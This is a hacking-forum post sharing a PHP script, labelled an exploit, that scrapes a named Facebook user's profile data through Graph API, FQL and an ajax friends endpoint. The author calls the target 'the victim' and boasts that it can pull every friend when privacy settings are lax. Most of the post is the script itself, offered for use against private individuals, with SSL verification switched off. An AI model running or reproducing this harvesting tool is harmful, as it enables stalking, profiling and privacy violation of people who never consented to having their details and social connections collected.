Jump to content
Fi8sVrs

Facebook Data Mining Utility

By Fi8sVrs, in Programe hacking

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted 

*NAME*: INURL API facebook
*TIPE*: TOOL - Capturing data facebook
*Tested on*: Linux
*EXECUTE*: php exploit.php perfilFacebook
*AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
*EMAIL*: inurllbr@gmail.com
*Blog*:http://blog.inurl.com.br
*Twitter*: https://twitter.com/googleinurl
*Fanpage*: https://fb.com/InurlBrasil
*GIT: *https://github.com/googleinurl
*PASTEBIN: *http://pastebin.com/u/Googleinurl
*YOUTUBE: *https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
*PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/

*PRINT:*
https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg
<http://i.imgur.com/45BFlNe.png>

*Description:*
The script captures information through an api facebook, data that can be
extracted: uid, username, name, first_name, middle_name, last_name, fri,
locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo,
pic_with_logo, username Just to have an affinity or the User have not set
the privacy of friends. it is possible to extract all friends of the victim.

*Usage info:*
php script.php {id/user}

*Exploit:*

<?php

/*

NAME: INURL API facebook

TIPE: TOOL - Capturing data facebook

Tested on: Linux

EXECUTE: php exploit.php perfilFacebook

AUTOR: Cleiton Pinheiro / NICK: GoogleINURL

EMAIL: inurllbr@gmail.com

Blog:http://blog.inurl.com.br

Twitter: https://twitter.com/googleinurl

Fanpage: https://fb.com/InurlBrasil

GIT: https://github.com/googleinurl

PASTEBIN: http://pastebin.com/u/Googleinurl

YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/

PRINT:

https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg

Description:

The script captures information through an api facebook, data that can be

extracted: uid, username, name, first_name, middle_name, last_name, fri,

locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo,

pic_with_logo, username Just to have an affinity or the User have not set

the privacy of friends. it is possible to extract all friends of the victim.

------------------------------------------------------

Usage info:

php script.php {id/user}

------------------------------------------------------

#PHP Version 5.4.7

#php5-curl LIB

#php5-cli LIB

#Apache 2.4

#allow_url_fopen On

#permission Reading

#Operating system LINUX

------------------------------------------------------

*/

error_reporting(0);

ini_set('display_errors', 0);

!isset($_SESSION) ? session_start() : NULL;

$_SESSION['config'] = array();

system("command clear");

echo menu();

function getHttpResponseCode($url) {

$curl = curl_init();

//print_r($url);

curl_setopt($curl, CURLOPT_URL, ($url));

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($curl, CURLOPT_HEADER, 0);

curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

//curl_setopt($curl, CURLOPT_PROXY,"localhost:8118");

return curl_exec($curl);

}

if (isset($argv[1]) && !empty($argv[1])) {

$_SESSION['config'] = json_decode(getHttpResponseCode("

http://graph.facebook.com/{$argv[1]}"), true);

$_SESSION['config2'] = getHttpResponseCode("

http://api.facebook.com/method/fql.query?query=" . urlencode("SELECT

uid,username, name, first_name, middle_name, last_name, sex, locale,

pic_small_with_logo, pic_big_with_logo, pic_square_with_logo,

pic_with_logo, username FROM user WHERE uid ={$_SESSION['config']['id']}"));

$xml = simplexml_load_string($_SESSION['config2']);

$array_ = json_decode(json_encode((array) $xml), 1);

$array = array($xml->getName() => $array_);

echo

"\033[1;34m

================================================================================================================

DADOS FACEBOOK

================================================================================================================

\n";

echo "\033[1;37m0x\033[0m\033[02;31mLINK:: \033[1;37m" .

(isset($_SESSION['config']['link']) ? $_SESSION['config']['link'] : NULL )

. "\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mID::

\033[1;37m{$array['fql_query_response']['user']['uid']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mUSERNAME::

\033[1;37m{$array['fql_query_response']['user']['username']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mNOME::

\033[1;37m{$array['fql_query_response']['user']['name']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mPRIMEIRO NOME::

\033[1;37m{$array['fql_query_response']['user']['first_name']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mSOBRENOME::

\033[1;37m{$array['fql_query_response']['user']['last_name']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mSEXO::

\033[1;37m{$array['fql_query_response']['user']['sex']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mLOCAL::

\033[1;37m{$array['fql_query_response']['user']['locale']}\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO PEQUENA:: \033[1;37m" .

urldecode($array['fql_query_response']['user']['pic_small_with_logo']) .

"\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO GRANDE:: \033[1;37m" .

urldecode($array['fql_query_response']['user']['pic_big_with_logo']) .

"\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO:: \033[1;37m" .

urldecode($array['fql_query_response']['user']['pic_square_with_logo']) .

"\n\n";

echo "\033[1;37m0x\033[0m\033[02;31mFOTO:: \033[1;37m" .

urldecode($array['fql_query_response']['user']['pic_with_logo']) .

"\n\n\033[0m";

echo "

http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1\n

";

$_SESSION['config3'] = getHttpResponseCode("

http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1

");

echo

"================================================================================================================\n";

$cont = 0;

$array2 = (explode('{"', $_SESSION['config3']));

foreach ($array2 as $valores) {

$valores =

str_replace('],"viewer_id":0},"bootloadable":{},"ixData":[]}', '',

str_replace(',"n":"","it":null}', '', $valores));

$valores = str_replace('"u":', "\033[1;37mURL::\033[0m\033[1;34m",

str_replace('t":', "\033[1;37mNOME::\033[0m\033[1;34m", str_replace('"i"',

"\033[1;37mID::\033[0m\033[1;34m", str_replace('\/', '/', $valores))));

echo "\033[02;31m[\033[1;37m".$cont++."\033[02;31m]\033[0m -

$valores\n";

}

} else {

echo menu() . " Falta definir parâmetro de busca, Exemplo=> php

face.php usuario\n";

}

function menu() {

system("command clear");

return("

\033[1;37m _____

\033[1;37m(_____)

\033[1;37m(\033[02;31m() ()\033[1;37m)

\033[1;37m \ /

\033[1;37m \ /

\033[1;37m /=\

\033[1;37m [___] / Googleinurl - [ INURL API facebook ]

\033[1;37m0xNeither war between hackers, nor peace for the system.

\033[1;37m0x\033[0m\033[02;31mhttp://blog.inurl.com.br

\033[1;37m0x\033[0m\033[02;31mhttps://fb.com/InurlBrasil

\033[1;37m0x\033[0m\033[02;31mhttp://twitter.com/@googleinurl\033[0m

[+] Pesquisa dados facebook, Ex: php face.php zuck

");

}

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...